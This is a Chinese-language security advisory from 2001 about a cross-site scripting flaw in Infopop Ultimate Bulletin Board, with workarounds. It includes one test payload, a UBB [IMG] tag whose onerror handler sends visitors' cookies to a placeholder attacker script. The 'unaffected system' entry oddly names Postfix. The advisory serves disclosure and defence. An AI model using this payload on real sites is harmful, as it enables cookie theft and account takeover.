安全研究
安全漏洞
UBB 跨站脚本执行漏洞
发布日期:2001-11-14
更新日期:2001-11-19
受影响系统:
Infopop Ultimate Bulletin Board
不受影响系统:
Wietse Venema Postfix 20011115
描述:
Infopop Ultimate Bulletin Board 存在一个安全问题,可能允许远程攻击者利用IE的
漏洞获取其它用户的Cookie。
<*来源:kyprizel (
kyprizel@hostel.tusur.ru)
链接:
http://archives.neohapsis.com/archives/bugtraq/2001-11/0109.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
kyprizel (
kyprizel@hostel.tusur.ru)提供了如下测试代码:
例如,提交下面的请求:
[IMG]http://about:test"onerror="this.src='http://somedomain.com/yourscript.p
hp';[/IMG]
就可能获取访问该链接的用户的Cookie。
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 暂时禁止使用UBB编码
* 在IE中禁止使用java脚本
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.infopop.com/浏览次数:3607
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |